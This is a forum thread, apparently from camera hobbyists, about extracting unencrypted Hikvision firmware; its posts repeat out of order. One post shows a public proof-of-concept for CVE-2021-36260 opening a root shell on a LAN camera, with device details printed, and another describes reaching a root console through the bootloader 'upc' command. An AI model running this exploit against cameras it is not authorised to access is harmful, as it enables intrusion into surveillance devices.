Fairly close at the bottom of here :or atleast a close firmware version.
Sorry, I should have been more clear. I want the unencrypted firmware/filesystem.Fairly close at the bottom of here :
Does it have to be that specific version of firmware?Sorry, I should have been more clear. I want the unencrypted firmware/filesystem.
alastair@PC-I5 ~/coding_stuff/bashis_disclosures $ ./Hikvision_CVE-2021-36260_RCE_POC.py --rhost 192.168.1.118 --shell
[*] Hikvision CVE-2021-36260
[*] PoC by bashis <mcw noemail eu> (2021)
[*] Checking remote "192.168.1.118:80"
ETag: "5c3-258-5e79f070"
[!] Remote is verified exploitable
Remote "192.168.1.118" not pwned, pwning now!
[*] Trying SSH to 192.168.1.118 on port 1337
BusyBox v1.26.2 (2020-02-17 17:46:29 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# pwd
/
# prtHardInfo
Start at 1970-01-01 00:00:54
Serial NOS-2CD2347G2-LU20210414AAWRF81942659
V5.5.134 build 200430
NetProcess Version: 1.8.1.636956 [20:11:59-Mar 9 2020]
Db Encrypt Version: 131072
hardwareVersion = 0x0
hardWareExtVersion = 0x0
encodeChans = 1
decodeChans = 1
alarmInNums = 0
alarmOutNums = 0
ataCtrlNums = 0
flashChipNums = 0
ramSize = 0x200
networksNums = 1
language = 1
devType = 0x23290
net reboot count = 0
vi_type = 62
vi_type2 = 62
lens_type = 0
lens_type2 = 0
gps_info = 0
audioInSupport = 2
abfType = 0
firmwareCode = 0000000200000100000000010dc1bc6f000000010000000100000002ffffffff050500860014041e00023290
shieldSupport = 0
IRSupport = 10
bFillLightType2 = 0
Path: /Camera/Platform/Branches/branches_frontend_software_platform/IPC_develop_branch/ipc_baseline/G3_5.5.134_202003181903
Last Changed Rev: 839403
Last Changed Date: 2020-04-30 15:19:59 +0800 (Thu, 30 Apr 2020)
#
If you have a working camera, another thing maybe worth trying is hooking up a serial TTL terminal to the console port, interrupt the bootloader, and try the 'upc' command.Sorry, I should have been more clear. I want the unencrypted firmware/filesystem.
I'll give it whirl and let you know how it goes, thanks for this!If you have a working camera, another thing maybe worth trying is hooking up a serial TTL terminal to the console port, interrupt the bootloader, and try the 'upc' command.
Admittedly older firmware that what you are looking for, but on a couple of cameras I bought recently, upc left the console in a minsystem root shell with ash not psh so the flash contents were fully accessible.
Serial NOS-2CD2386G2-IU20210904AAWRG48463698
V5.5.800 build 210628